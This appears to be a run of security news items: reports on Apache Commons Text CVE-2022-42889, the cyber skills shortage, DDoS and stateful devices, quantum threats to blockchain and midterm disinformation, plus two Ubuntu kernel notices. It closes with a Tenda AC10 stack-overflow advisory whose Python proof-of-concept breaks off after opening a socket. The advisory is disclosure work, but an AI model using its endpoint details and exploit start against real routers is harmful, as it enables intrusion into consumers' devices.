There's nothing yet to suggest CVE-2022-42889 is the next Log4j. But proof-of-concept code is available, and interest appears to be ticking up.

Researchers are closely tracking a critical, newly disclosed vulnerability in Apache Commons Text that gives unauthenticated attackers a way to execute code remotely on servers running applications with the affected component.

The flaw (CVE-2022-42889) has been assigned a severity ranking of 9.8 out of a possible 10.0 on the CVSS scale and exists in versions 1.5 through 1.9 of Apache Commons Text. Proof-of-concept code for the vulnerability is already available, though so far there has been no sign of exploit activity.

**Updated Version Available**

The Apache Software Foundation (ASF) released an updated version of the software (Apache Commons Text 1.10.0) on September 24 but issued an advisory on the flaw only last Thursday. In it, the Foundation described the flaw as stemming from insecure defaults when Apache Commons Text performs variable interpolation, which basically is the process of looking up and evaluating string values in code that contain placeholders. "Starting with version 1.5 and continuing through 1.9, the set of default Lookup instances included interpolators that could result in arbitrary code execution or contact with remote servers," the advisory said.

NIST, meanwhile, urged users to upgrade to Apache Commons Text 1.10.0, which it said, "disables the problematic interpolators by default."

The ASF Apache describes the Commons Text library as providing additions to the standard Java Development Kit's (JDK) text handling. Some 2,588 projects currently use the library, including some major ones such as Apache Hadoop Common, Spark Project Core, Apache Velocity, and Apache Commons Configuration, according to data in the Maven Central Java repository.

In an advisory today, GitHub Security Lab said it was one of its pen testers that had discovered the bug and reported it to the security team at ASF in March.

Researchers tracking the bug so far have been cautious in their assessment of its potential impact. Noted security researcher Kevin Beaumont wondered in a tweet on Monday if the vulnerability could result in a potential Log4shell situation, referring to the infamous Log4j vulnerability from late last year.

"Apache Commons Text supports functions that allow code execution, in potentially user supplied text strings," Beaumont said. But in order to exploit it, an attacker would need to find Web applications using this function that also accept user input, he said. "I won't be opening up MSPaint yet, unless anybody can find webapps that use this function and allow user supplied input to reach it," he tweeted.

**Proof-of-Concept Exacerbates Concerns**

Researchers from threat intelligence firm GreyNoise told Dark Reading the company was aware of PoC for CVE-2022-42889 becoming available. According to them, the new vulnerability is nearly identical to one ASF announced in July 2022 that also was associated with variable interpolation in Commons Text. That vulnerability (CVE-2022-33980) was found in Apache Commons Configuration and had the same severity rating as the new flaw.

"We are aware of Proof-Of-Concept code for CVE-2022-42889 that can trigger the vulnerability in an intentionally vulnerable and controlled environment," GreyNoise researchers say. "We are not aware of any examples of widely deployed real-world applications utilizing the Apache Commons Text library in a vulnerable configuration that would allow attackers to exploit the vulnerability with user-controlled data."

GreyNoise is continuing to monitor for any evidence of "proof-in-practice" exploit activity, they added.

Jfrog Security said it is monitoring the bug and so far, it appears likely that the impact will be less widespread than Log4j. "New CVE-2022-42889 in Apache Commons Text looks dangerous," JFrog said in a tweet. "Seems to only affect apps that pass attacker-controlled strings to-StringLookupFactory.INSTANCE.interpolatorStringLookup().lookup()," it said.

The security vendor said people using Java version 15 and later should be safe from code execution since script interpolation won't work. But other potential vectors for exploiting the flaw — via DNS and URL — would still work, it noted.

Researchers Keep a Wary Eye on Critical New Vulnerability in Apache Commons Text

Just 65 cybersecurity professionals are in the workforce for every 100 available jobs, new study shows.

Widely reported shortages of trained cybersecurity professionals are driving the industry to try to come up with some with creative recruiting and training solutions. But it's complicated. 

At the very same time, automation is increasingly performing the tedious entry-level tasks that early-career threat hunters once built their chops working on, making it harder to gain early experience. 

The result is demand for job openings requiring some previous cybersecurity experience over the past year grew 2.4 times faster than the rate of the rest of the economy, while only 65 cybersecurity professionals are in the workforce for every 100 available jobs, according to newly released research from CyberSeek and partners National Initiative for Cybersecurity Education at NIST, Lightcast, and ComTIA. Overall there were some 769,736 cybersecurity job openings listed over the 12-month period ending in September of this year.

"The CyberSeek data reaffirms the critical importance of feeder roles and thinking more creatively about on-ramps and career pathways," Ron Culler, vice president cyber learning officer, CompTIA said about the cybersecurity employee recruitment study findings. "We see this trend continuing and are committed to ensuring that cybersecurity professionals are prepared for the current and future challenges this will bring."

Besides staffing up the security operations, employers are increasingly searching for potential hires with cybersecurity skill sets across other specialized areas of business including auditor, software developer, cloud architect, and tech support engineer, CyberSeek found. 

**Cybersecurity Experience Expectations Unrealistic **

In many cases, those demands for cybersecurity experience are unnecessary, Timothy Morris, chief security adviser with Tanium, tells Dark Reading.

"Degrees are not required for most cybersecurity jobs," Morris explains. "Provide on-the-job training with tuition assistance for degrees. Building great, world-class cybersecurity teams requires a skill diversity. I've had success with folks that have varied backgrounds (teachers, retailers, mechanics) seeking a new career." 

Instead, Morris suggests employers search out job seekers with curiosity and a passion for solving problems. 

Phil Neray, vice president of cyber-defense strategy at CardinalOps, agrees and suggests hiring managers looking for cybersecurity talent consider applicants with past job experience in crime and fraud investigations, history and foreign policy, data science, IT networking, and music.

"Hiring in a tough labor market requires a certain level of open-mindedness and intellectual humility on the part of the hiring manager," Neray tells Dark Reading. "There are lots of people with nontraditional backgrounds who can become excellent cybersecurity professionals because they exhibit key traits like a willingness to learn, an analytical 'hacker mindset' when discovering the unknown, creativity, and attention to detail."

Cybersecurity's Hiring Spree Requires a Recruiting Rethink

Excessive statefulness hurts the ability to scale networks, applications, and ancillary supporting infrastructure, thus affecting an entire service delivery chain's ability to withstand a DDoS attack.

In this era of accelerated digital transformation, organizations have come to rely on increasingly complex application and service delivery chains to seamlessly and consistently deliver goods and services across the Internet. In turn, they expect similar levels of service and consistency from business partners and suppliers — and all at Internet speed and scale.

This is why, of the three elements of information security — confidentiality, integrity, and availability — it is availability that is at the forefront of the organization's ability to conduct business and attain its goals. The growing reliance on remote work and education has only served to increase the criticality of availability across all verticals, at all levels of contribution.

As a result of this wholesale shift in operational models, it is now possible for threat actors to disrupt not only an organization's public-facing applications and services — which is bad enough, both in terms of revenue and of brand reputation — but to negatively impact the ability of front-line workers to execute their responsibilities. This is the goal of distributed denial-of-service (DDoS) attacks.

**Scaling Defenses as DDoS Attacks Increase**

Threat actors launch DDoS attacks for a variety of reasons, including extortion, contracted attacks from business competitors, ideological motivations, disputes related to online gaming, and even simple nihilism. And DDoS attacks against an organization's supply chain partners or external services vendors can be just as disruptive as a direct attack against the organization's organic assets. The record-breaking number of DDoS attacks observed during 2021 exhibited significant increases in preattack reconnaissance, the introduction of multiple new DDoS vectors, and unprecedented growth in multivector DDoS attacks targeted across multiple verticals.

While metrics such as attack volume (bits-per-second, or bps), throughput (packets-per-second, or pps), and application-layer load (transactions-per-second \[tps\] or queries-per-second \[qps\]) are necessary for understanding attack dynamics and scaling DDoS defenses, it is important to realize that DDoS attacks are attacks against both capacity and state.

In the networking context, maintaining state means tracking the current status or condition of a given network communication session. In terms of applications and services, it means doing so for discrete transactions or processes. While stateful operation can be desirable in some specific circumstances and for short time frames, excessive instantiations of state impose significant constraints on the ability to scale networks, applications, and ancillary supporting infrastructure, thus affecting the ability of the entire service delivery chain to withstand DDoS attacks.

**How DDoS Attacks Overcome Stateful Firewalls, IPSes, and Load-Balancers**

Placing a stateful firewall — a category that encompasses Web application firewalls (WAFs) — on an enterprise network enhances security by dropping all incoming network traffic not directly related to outgoing user-initiated network requests. However, it does not help secure public-facing Web servers, authoritative DNS servers, application servers, and the like because incoming packets to those servers and services are unsolicited.

Also, low-volume DDoS attacks can overwhelm even the highest-capacity stateful firewalls. This is due to the significant memory and processing overhead consumed in tracking connection state for all incoming Internet traffic; it simply isn't possible to do so at Internet scale. When stateful firewalls — or the applications, services, and servers sited behind them — are subjected to a DDoS attack, the firewall state-tables are quickly exhausted, and either the firewalls themselves will be rendered inoperable under the increased traffic load or the programmatically generated attack traffic will crowd out legitimate incoming connections by exhausting the ability of the firewall to track state.

This allows attackers to successfully disrupt the organization's public-facing services, including e-commerce, high-demand content, customer service and support applications, and DNS, as well as the VPN infrastructure for the remote workforce.

Stateful load-balancers, intrusion prevention systems (IPSes), and the applications and services behind them are also susceptible to state exhaustion as a result of DDoS attacks. The same is true of applications that carry excessive state at key points in the service delivery chain. Accordingly, state minimization and state distribution should be key in network and application design.

**Best Current Practices for Network Infrastructure**

Industry coalition Mutually Agreed Norms for Routing Security (MANRS) suggests a set of network infrastructure self-protection best current practices (BCPs) to implement to ensure that the network itself is resilient and can maintain availability even in the face of attack. Critical service delivery elements, such as authoritative and recursive DNS servers, application and content farms, etc., must also be configured and deployed in a scalable, distributed, and resilient manner. Stateless access-control lists (ACLs) should be implemented to enforce situationally appropriate network access control policies for servers, services, and applications, reducing the options available to attackers.

Out-of-band (OOB) management capabilities and edge-to-edge visibility into all network traffic are crucial to maintaining situational awareness and control when under attack.

Flow telemetry, such as NetFlow and IPFIX, should be exported from edge routers and layer-3 switches to provide visibility into all traffic ingressing, egressing, and traversing the network. All network edges should be instrumented. Flow telemetry collection and analysis allows network operators to detect, classify, and trace back DDoS attack traffic in real time.

Network infrastructure-based DDoS mitigation techniques such as flowspec and source-based remote triggered blackholing (S/RTBH) allow edge routers and layer-3 switches to be leveraged against DDoS attacks. Along with flow telemetry export, these mechanisms should be supported in all peering- and customer aggregation-edge network infrastructure elements.

Intelligent DDoS mitigation systems (IDMSes) are intended to protect against volumetric, application-layer, and state-exhaustion DDoS attacks. They incorporate DDoS-specific countermeasures that are either fully stateless or which instantiate into a minimal, ephemeral state that is quickly shed in order to differentiate between DDoS attack traffic and legitimate user/partner traffic. IDMSes can typically evaluate all contents of the packet header and payload, reassemble fragmented packets and application-layer messages, and evaluate incoming requests to ensure that they are sourced from legitimate clients, rather than DDoS-capable botnets.

By implementing these BCPs and ensuring that they have the ability to detect, classify, trace back, and mitigate DDoS attacks, organizations can ensure that their public-facing applications, services, and content remain available — even in the face of attack.

The Risk of Stateful Anti-Patterns in Enterprise Internet Architecture

Research report identifies the challenges as well as the opportunities for new products and services that arise from the threat that quantum computers pose to the "blockchain" mechanism.

**DUBLIN, Oct. 14, 2022 /PRNewswire/** — The report "The Quantum Threat to Blockchain: Emerging Business Opportunities" has been added to **ResearchAndMarkets.com's** offering.

This new research report identifies not only the challenges, but also the opportunities in terms of new products and services that arise from the threat that quantum computers pose to the "blockchain" mechanism. According to a recent study by the consulting firm Deloitte, approximately one-fourth of the blockchain-based cybercurrency Bitcoin in circulation in 2022 is vulnerable to quantum attack.

The analyst foresees major commercial opportunities arising to protect blockchain against future quantum computer intrusions and agrees with the White House National Security Memorandum NSM-10, released on May 04, 2022, which indicates the urgency of addressing imminent quantum computing threats and the risks they present to the economy and to national security in the latest report _"The Quantum Threat to Blockchain: Emerging Business Opportunities"_.

Although the main focus of this report is on the quantum threat to the integrity of cybercurrencies, the applicability of blockchain (and therefore the threat of quantum) is much broader than the newer types of money. Blockchain technology has been proposed for a wide range of transactions, including insurance, real estate, voting, supply chain tracking, gambling, etc.

A quantum computer-compromised blockchain would allow eavesdropping, unauthorized client authentication, signed malware, cloak-in encrypted session, a man-in-the-middle attack (MITM), forged documents, and emails. These attacks can lead to mission-critical operations disruption, reputation, and trust damage, as well as loss of intellectual property, financial assets, and regulated data. Note that this report covers both technical and policy issues relating to the quantum vulnerability of blockchain.

As things stand now, blockchains are secured with relatively garden-variety encryption schemes. However, quantum computers will have the computational power to break these schemes as they grow in power. Predictions of when quantum computers will attain such power vary from five years to never, but, the threat hangs over the cryptocurrency industry as a whole and is a dampener to its prospects.

Quantum computers directly threaten classical public-key/private key cryptography blockchain technologies because they can break the computational security assumptions of elliptic curve cryptography. They also significantly weaken the security of critical private key or hash function algorithms, which protect the blockchain's secrets.

Also, some of the early expenditures on quantum-safe technology in the cybercurrency market will undoubtedly go to protecting data from attacks later, when quantum computing resources become mature. This issue becomes more important as we grow closer to the day when powerful quantum computers become a reality. But preemptive action on the quantum threat means that the business opportunities in this space are emerging right now.

As this report makes clear, the publisher sees major commercial opportunities to protect blockchain and the technologies dependent on blockchain against future quantum computer intrusions. One area that this report focuses on especially is post-quantum encryption (PQC), in which relatively traditional encryption schemes are devised that are simply much harder to break than currently used encryption schemes. With NIST announcing a new set of PQC standards in July 2022, the publisher believes that PQC firms will be receiving major investments in the near term as a result of the growing concerns about bad actors with access to quantum computing resources.

The publisher believes there is also a need for relatively low-cost information-theoretically secure (ITS) solutions that instantly strengthen standardized cryptography systems used in blockchains. Thus, this report also discusses quantum-enabled blockchain architectures based on Quantum Random Number Generators (QRNG) and Quantum Key Distribution (QKD).

**Key Highlights:**

*   With NIST announcing a new set of PQC standards in July 2022, PQC firms will soon be receiving major investments in the near term , much of which will apply to blockchain. However, not all NIST-based PQC solutions will be feasible for blockchain use. Given the nature and intricacy of PQC, it will take years of planning for a successful migration to PQC-backed Blockchain protection.
*   The earliest of expenditures on quantum safe technology in the block chain market will go to protecting data from attacks later, when quantum computing resources become mature. This issue becomes more important as we grow closer to the day when powerful quantum computers become a reality. But data theft today requires preemptive action. The quantum threat to the blockchain means that business opportunities in this space are emerging right now.
*   There is a need for low-cost information-theoretically secure (ITS) solutions that instantly strengthen standardized cryptography systems used in blockchains. Already much discussed in this context are quantum-enabled blockchain architectures based on Quantum Random Number Generators (QRNG) and Quantum Key Distribution (QKD). Another important concept is quantum-enabled blockchain, which refers to an entire blockchain or some aspects of the blockchain functionality being run in quantum computing environments.
*   Mining is another aspect of blockchains vulnerable to quantum attacks. Mining is the consensus process that certifies new transactions and keeps blockchain activities protected. One risk with mining is that miners using quantum computers could launch a 51% attack. A 51% attack is when a single entity controls more than half of the computational power of the blockchain. A quantum attack on mining would undermine the network's hashing power.

**Key Topics Covered:**

**Chapter One: Introduction**  
1.1 Objective and Scope of this Report  
1.1.1 The Threat of Quantum Computers to Blockchain  
1.2 Cryptography Background to this Report  
1.2.1 Concerned Organizations  
1.2.2 NIST PQC Efforts and Beyond  
1.2.3 Addressable Market for Quantum-safe Cybercurrency  
1.3 The Goals of this Report

**Chapter Two: Classical Blockchain Cryptography and Quantum Computing Attacks**  
2.1 Overview of the Quantum Threat  
2.2 NIST and Post-quantum Cryptography  
2.2.1 Structure of the NIST PQC Effort  
2.2.2 Importance of Asymmetric Digital Signatures  
2.2.3 Impact of Doubling Key Size  
2.2.4 Algorithm Security Strength  
2.3 Advanced Encryption Standard (AES)  
2.4 Quantum Attack Resources Estimates to Break ECC and DSA  
2.5 Quantum Resistant Cryptography for Blockchains  
2.5.1 Taproot and Bitcoin Core  
2.5.2 Impact of NIST-based PQC Algorithms  
2.6 Post-quantum Random Oracle Model  
2.6.1 Modeling Random Oracles for Quantum Attackers  
2.7 Summary of this Chapter

**Chapter Three: Quantum Opportunities of the Blockchain Kind**  
3.1 Blockchain Basics  
3.1.1 What are Classical Blockchains?  
3.2 Quantum-Enabled Blockchain  
3.2.1 Role of Quantum-safe Security Technologies  
3.3 Blockchain Security  
3.3.1 Role of Conventional Cryptography  
3.3.2 Attacks on Classical Cryptography  
3.3.2.1 Some Known Attacks Against ECDSA  
3.3.2.2 ECDSA Key Pair Generation:  
3.3.2.3 Signature Computation:  
3.3.2.4 Recommendations:  
3.3.2.5 Blockchain Security Summary:  
3.4 Mitigating Cyberattacks on Blockchains  
3.5 Blockchain Security: Entropy/Randomness  
3.5.1 Examples of Low Entropy Attacks  
3.6 Random Number Generator Product Evolution  
3.6.1 PRNGs  
3.6.2 TRNGs  
3.6.3 QRNGs  
3.6.4 OpenSSL 3.0  
3.7 Summary of this Chapter

**Chapter Four: Quantum Impacts on the Cryptocurrency Business**  
4.1 Qubit and Quantum Gates  
4.1.1 Qubits  
4.1.2 Quantum Gates  
4.1.3 Quantum Fourier Transform  
4.1.4 Oracle  
4.1.5 Amplitude Amplification  
4.2 Quantum Algorithms  
4.2.1 Shor's Algorithm  
4.3 Specific Quantum Threat to Blockchains  
4.3.1 Risk of Quantum Attack in Authentication  
4.3.2 Grover's Algorithm and Hashing  
4.4 Risk of Quantum Attack in Mining  
4.5 Nonce Attacks  
4.6 Blockchain Data Structures  
4.7 Summary of this Chapter

**Chapter Five: Quantum Hash and QKD**  
5.1 Classical to Quantum Hashing Functions  
5.1.1 Summary: Quantum Hashing Functions  
5.2 Quantum Key Distribution (QKD)  
5.2.1 Technical Issues  
5.2.2 Issues Needing Work in Blockchain Enabled QKD  
5.2.2.1 Summary: QKD Technical Issues and Blockchain Integration  
5.2.2.2 Software-defined Networking QKD and Blockchain  
5.3 Notes on Interface Protocols  
5.3.1 Southbound Interface  
5.3.2 Northbound Interface Protocol  
5.3.3 Resource Allocation  
5.4 Steps Blockchain Organizations Can Take Now  
5.5 Summary of this Chapter

**About the Publisher**

**About the Analyst**

**Acronyms and Abbreviations Used In this Report**

For more information about this report visit https://www.researchandmarkets.com/r/lh4alo

**SOURCE:** Research and Markets

New Research Report Predicts Blockchain and Quantum Threat Will Quickly Spread Beyond Cybercurrencies; Surge in New Product and Services Opportunities to Come

Ubuntu Security Notice 5682-1 - It was discovered that the BPF verifier in the Linux kernel did not properly handle internal data structures. A local attacker could use this to expose sensitive information. It was discovered that an out-of-bounds write vulnerability existed in the Video for Linux 2 implementation in the Linux kernel. A local attacker could use this to cause a denial of service or possibly execute arbitrary code.

==========================================================================  
Ubuntu Security Notice USN-5682-1  
October 14, 2022

linux-aws-5.4 vulnerabilities  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 18.04 LTS

Summary:

Several security issues were fixed in the Linux kernel.

Software Description:  
- linux-aws-5.4: Linux kernel for Amazon Web Services (AWS) systems

Details:

It was discovered that the BPF verifier in the Linux kernel did not  
properly handle internal data structures. A local attacker could use this  
to expose sensitive information (kernel memory). (CVE-2021-4159)

It was discovered that an out-of-bounds write vulnerability existed in the  
Video for Linux 2 (V4L2) implementation in the Linux kernel. A local  
attacker could use this to cause a denial of service (system crash) or  
possibly execute arbitrary code. (CVE-2022-20369)

Duoming Zhou discovered that race conditions existed in the timer handling  
implementation of the Linux kernel's Rose X.25 protocol layer, resulting in  
use-after-free vulnerabilities. A local attacker could use this to cause a  
denial of service (system crash). (CVE-2022-2318)

Roger Pau Monné discovered that the Xen virtual block driver in the Linux  
kernel did not properly initialize memory pages to be used for shared  
communication with the backend. A local attacker could use this to expose  
sensitive information (guest kernel memory). (CVE-2022-26365)

Pawan Kumar Gupta, Alyssa Milburn, Amit Peled, Shani Rehana, Nir Shildan  
and Ariel Sabba discovered that some Intel processors with Enhanced  
Indirect Branch Restricted Speculation (eIBRS) did not properly handle RET  
instructions after a VM exits. A local attacker could potentially use this  
to expose sensitive information. (CVE-2022-26373)

Eric Biggers discovered that a use-after-free vulnerability existed in the  
io_uring subsystem in the Linux kernel. A local attacker could possibly use  
this to cause a denial of service (system crash) or possibly execute  
arbitrary code. (CVE-2022-3176)

Roger Pau Monné discovered that the Xen paravirtualization frontend in the  
Linux kernel did not properly initialize memory pages to be used for shared  
communication with the backend. A local attacker could use this to expose  
sensitive information (guest kernel memory). (CVE-2022-33740)

It was discovered that the Xen paravirtualization frontend in the Linux  
kernel incorrectly shared unrelated data when communicating with certain  
backends. A local attacker could use this to cause a denial of service  
(guest crash) or expose sensitive information (guest kernel memory).  
(CVE-2022-33741, CVE-2022-33742)

Oleksandr Tyshchenko discovered that the Xen paravirtualization platform in  
the Linux kernel on ARM platforms contained a race condition in certain  
situations. An attacker in a guest VM could use this to cause a denial of  
service in the host OS. (CVE-2022-33744)

It was discovered that the Netlink Transformation (XFRM) subsystem in the  
Linux kernel contained a reference counting error. A local attacker could  
use this to cause a denial of service (system crash). (CVE-2022-36879)

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 18.04 LTS:  
   linux-image-5.4.0-1086-aws      5.4.0-1086.93~18.04.1  
   linux-image-aws                 5.4.0.1086.66

After a standard system update you need to reboot your computer to make  
all the necessary changes.

ATTENTION: Due to an unavoidable ABI change the kernel updates have  
been given a new version number, which requires you to recompile and  
reinstall all third party kernel modules you might have installed.  
Unless you manually uninstalled the standard kernel metapackages  
(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,  
linux-powerpc), a standard system upgrade will automatically perform  
this as well.

References:  
   https://ubuntu.com/security/notices/USN-5682-1  
   CVE-2021-4159, CVE-2022-20369, CVE-2022-2318, CVE-2022-26365,  
   CVE-2022-26373, CVE-2022-3176, CVE-2022-33740, CVE-2022-33741,  
   CVE-2022-33742, CVE-2022-33744, CVE-2022-36879

Package Information:  
   https://launchpad.net/ubuntu/+source/linux-aws-5.4/5.4.0-1086.93~18.04.1

Ubuntu Security Notice USN-5682-1

Foreign nations continue to target various US public entities and private industries with cyberattacks, but the coming midterms are driving more disinformation than hacking, say experts.

While traditional cyberattack operations against US government organizations have remained fairly consistent, influence and disinformation attacks by foreign nations have increased in the run-up to the US midterm elections.  

On the cyberattack front, the China-linked hacking group Budworm has targeted several government agencies, including the legislature for a US state, over the past six months, according to Symantec, part of Broadcom Software. The attack on a US government organization is the second recent incident — after a hiatus of more than six years — where the group has targeted a US private-sector agency, the company's researchers stated in an advisory.

The attack is a departure from the group's more recent strategy of targeting Southeast Asia, and could mark a shift in strategy, says Dick O'Brien, principal intelligence analyst for the Symantec Threat Hunter team.  

The group "has been mounting espionage attacks in other regions, mostly Asia and the Middle East, \[and\] earlier this year German intelligence warned of attacks on organizations in that country," he says. "We consider Budworm to be one of the more capable APT outfits, and the return to the US could signal a change in strategic priorities."

However, security experts expect mostly a variety of influence attacks to ramp up against US government agencies and the campaigns of political candidates as the country's midterm elections approach. 

Cyber-intelligence firm Recorded Future pointed to the US intelligence community's assessment of foreign threats to the 2020 election and concluded that the country should expect more of the same in 2022.

"\[I\]n 2022, such behavior \[attempting to influence politics\] has likely only intensified against the backdrop of conventional and hybrid warfare in Ukraine, broad international ramifications of said conflict, lingering effects of a global pandemic, and a broadening distrust in traditional democratic institutions," Recorded Future stated in its report, adding: "The key motivations for influencing US elections are typically centered around adversaries' long-term geopolitical interests and furthering their own domestic goals."

Russia is focused on "sowing discord with regard to US political and societal affairs," with a focus on hindering concerted opposition to its invasion of Ukraine, while China conducts both public and private campaigns against its detractors, and Iranian actors aim to create support for a nuclear deal. Domestic extremists have become a significant disinformation threat over the past half decade, the company concluded.

**Not Just Russia**

Foreign countries continue to level a variety of attacks against public and private US organizations. In addition to Budworm, aka Aquatic Panda, cybersecurity services firm CrowdStrike has encountered North Korean hacking groups such as Stardust Chollima attacking financial organizations and stealing cryptocurrency and Iranian groups such as Charming Kitten targeting US government officials.

Recently, FBI officials warned both Republican and Democratic campaigns that they are being targeted by hackers thought to be linked to the Chinese state-sponsored APT1 group, according to The Washington Post. The hackers targeted the domains belonging to more than 100 political parties in US states with Internet scans and other attack activity, the National Security Agency (NSA) reported warned.

Such disruptive attacks and financial hacking are a constant presence, says Adam Meyers, senior vice president of threat intelligence for CrowdStrike.

"There is constantly espionage operations targeting the US — you know, constant, we are tracking it every single day," he says.

With the US midterm elections less than a month away, much of the disinformation has focused on attempting to change attitudes of undecided voters and energizing supporters to get out and vote.

In addition, some threat actors have targeted election officials with online attacks. County-level election workers are being targeted with phishing attacks, with Arizona, for example, seeing a doubling of attacks between the second and third quarters, according to endpoint detection and response (EDR) firm Trellix. Another battleground state, Pennsylvania, also saw an dramatic increase of nearly 70% in malicious e-mail messages, the company said in an Oct. 12 blog post.

The surge in e-mail messages is a reminder that election security issues affect smaller government agencies, which do not have the deep pockets of larger companies, Trellix researchers stated in the post.

"\[S\]tates and localities do not operate on an equal cybersecurity footing" as the federal government, they said. "Some will be more susceptible to attacks than others and many will continue to require the help of the federal government to not only harden themselves to these and other attacks, but also educate local election employees in cyber hygiene to thwart them at their point of attack."

**CISA, FBI: No "Successful Attack" on Election Systems**

To reassure US citizens that their votes will count, the Cybersecurity and Infrastructure Security Agency (CISA) and the Federal Bureau of Investigations (FBI) published an announcement on Oct. 4, emphasizing that the agencies have not yet seen any significant, nor successful, attack on election systems.  

"As of the date of this report, the FBI and CISA have no reporting to suggest cyber activity has ever prevented a registered voter from casting a ballot, compromised the integrity of any ballots cast, or affected the accuracy of voter registration information," the agencies stated. "Any attempts tracked by FBI and CISA have remained localized and were blocked or successfully mitigated with minimal or no disruption to election processes."

Former president Donald Trump and his supporters have pushed dispelled theories of election fraud both prior to and following the 2020 presidential election. In the Republican primaries, many Trump supporters also made claims, without evidence, of election fraud, prior to the final tally, even when they won the primary.

CISA and the FBI did not address any specific claims, but warned voters to be critical of such news.

"Be wary of emails or phone calls from unfamiliar email addresses or phone numbers that make suspicious claims about the elections process or of social media posts that appear to spread inconsistent information about election-related incidents or results," the agencies stated.

Disinformation Attacks Threaten US Midterm Elections

Ubuntu Security Notice 5683-1 - It was discovered that the framebuffer driver on the Linux kernel did not verify size limits when changing font or screen size, leading to an out-of- bounds write. A local attacker could use this to cause a denial of service or possibly execute arbitrary code. Selim Enes Karaduman discovered that a race condition existed in the General notification queue implementation of the Linux kernel, leading to a use-after-free vulnerability. A local attacker could use this to cause a denial of service or possibly execute arbitrary code.

==========================================================================  
Ubuntu Security Notice USN-5683-1  
October 14, 2022

linux-ibm vulnerabilities  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 22.04 LTS

Summary:

Several security issues were fixed in the Linux kernel.

Software Description:  
- linux-ibm: Linux kernel for IBM cloud systems

Details:

It was discovered that the framebuffer driver on the Linux kernel did not  
verify size limits when changing font or screen size, leading to an out-of-  
bounds write. A local attacker could use this to cause a denial of service  
(system crash) or possibly execute arbitrary code. (CVE-2021-33655)

Selim Enes Karaduman discovered that a race condition existed in the  
General notification queue implementation of the Linux kernel, leading to a  
use-after-free vulnerability. A local attacker could use this to cause a  
denial of service (system crash) or possibly execute arbitrary code.  
(CVE-2022-1882)

Duoming Zhou discovered that race conditions existed in the timer handling  
implementation of the Linux kernel's Rose X.25 protocol layer, resulting in  
use-after-free vulnerabilities. A local attacker could use this to cause a  
denial of service (system crash). (CVE-2022-2318)

Roger Pau Monné discovered that the Xen virtual block driver in the Linux  
kernel did not properly initialize memory pages to be used for shared  
communication with the backend. A local attacker could use this to expose  
sensitive information (guest kernel memory). (CVE-2022-26365)

Pawan Kumar Gupta, Alyssa Milburn, Amit Peled, Shani Rehana, Nir Shildan  
and Ariel Sabba discovered that some Intel processors with Enhanced  
Indirect Branch Restricted Speculation (eIBRS) did not properly handle RET  
instructions after a VM exits. A local attacker could potentially use this  
to expose sensitive information. (CVE-2022-26373)

Eric Biggers discovered that a use-after-free vulnerability existed in the  
io_uring subsystem in the Linux kernel. A local attacker could possibly use  
this to cause a denial of service (system crash) or possibly execute  
arbitrary code. (CVE-2022-3176)

Roger Pau Monné discovered that the Xen paravirtualization frontend in the  
Linux kernel did not properly initialize memory pages to be used for shared  
communication with the backend. A local attacker could use this to expose  
sensitive information (guest kernel memory). (CVE-2022-33740)

It was discovered that the Xen paravirtualization frontend in the Linux  
kernel incorrectly shared unrelated data when communicating with certain  
backends. A local attacker could use this to cause a denial of service  
(guest crash) or expose sensitive information (guest kernel memory).  
(CVE-2022-33741, CVE-2022-33742)

Jan Beulich discovered that the Xen network device frontend driver in the  
Linux kernel incorrectly handled socket buffers (skb) references when  
communicating with certain backends. A local attacker could use this to  
cause a denial of service (guest crash). (CVE-2022-33743)

Oleksandr Tyshchenko discovered that the Xen paravirtualization platform in  
the Linux kernel on ARM platforms contained a race condition in certain  
situations. An attacker in a guest VM could use this to cause a denial of  
service in the host OS. (CVE-2022-33744)

It was discovered that the virtio RPMSG bus driver in the Linux kernel  
contained a double-free vulnerability in certain error conditions. A local  
attacker could possibly use this to cause a denial of service (system  
crash). (CVE-2022-34494, CVE-2022-34495)

It was discovered that the Netlink Transformation (XFRM) subsystem in the  
Linux kernel contained a reference counting error. A local attacker could  
use this to cause a denial of service (system crash). (CVE-2022-36879)

Domingo Dirutigliano and Nicola Guerrera discovered that the netfilter  
subsystem in the Linux kernel did not properly handle rules that truncated  
packets below the packet header size. When such rules are in place, a  
remote attacker could possibly use this to cause a denial of service  
(system crash). (CVE-2022-36946)

Jann Horn discovered that the KVM subsystem in the Linux kernel did not  
properly handle TLB flush operations in some situations. A local attacker  
in a guest VM could use this to cause a denial of service (guest crash) or  
possibly execute arbitrary code in the guest kernel. (CVE-2022-39189)

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 22.04 LTS:  
   linux-image-5.15.0-1015-ibm     5.15.0-1015.17  
   linux-image-ibm                 5.15.0.1015.14

After a standard system update you need to reboot your computer to make  
all the necessary changes.

ATTENTION: Due to an unavoidable ABI change the kernel updates have  
been given a new version number, which requires you to recompile and  
reinstall all third party kernel modules you might have installed.  
Unless you manually uninstalled the standard kernel metapackages  
(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,  
linux-powerpc), a standard system upgrade will automatically perform  
this as well.

References:  
   https://ubuntu.com/security/notices/USN-5683-1  
   CVE-2021-33655, CVE-2022-1882, CVE-2022-2318, CVE-2022-26365,  
   CVE-2022-26373, CVE-2022-3176, CVE-2022-33740, CVE-2022-33741,  
   CVE-2022-33742, CVE-2022-33743, CVE-2022-33744, CVE-2022-34494,  
   CVE-2022-34495, CVE-2022-36879, CVE-2022-36946, CVE-2022-39189

Package Information:  
   https://launchpad.net/ubuntu/+source/linux-ibm/5.15.0-1015.17

Ubuntu Security Notice USN-5683-1

Tenda AC10 V15.03.06.23 contains a Stack overflow vulnerability via /goform/formSetSpeedWan.

Permalink

**Tenda AC10V15.03.06.23 Stack overflow vulnerability****Firmware information**

*   Manufacturer's address：https://www.tenda.com.cn/
    
*   Firmware download address ： https://www.tenda.com.cn/download/detail-2734.html
    

**Affected version**

**Vulnerability details**

/goform/SetSpeedWan，speed\_dir is controllable and will eventually be spliced into ret\_buf by sprintf. It is worth noting that the size is not checked, resulting in a stack overflow vulnerability

**Poc**

import socket
import os

li \= lambda x : print('\\x1b\[01;38;5;214m' + x + '\\x1b\[0m')
ll \= lambda x : print('\\x1b\[01;38;5;1m' + x + '\\x1b\[0m')

ip \= '192.168.0.1'
port \= 80

r \= socket.socket(socket.AF\_INET, socket.SOCK\_STREAM)

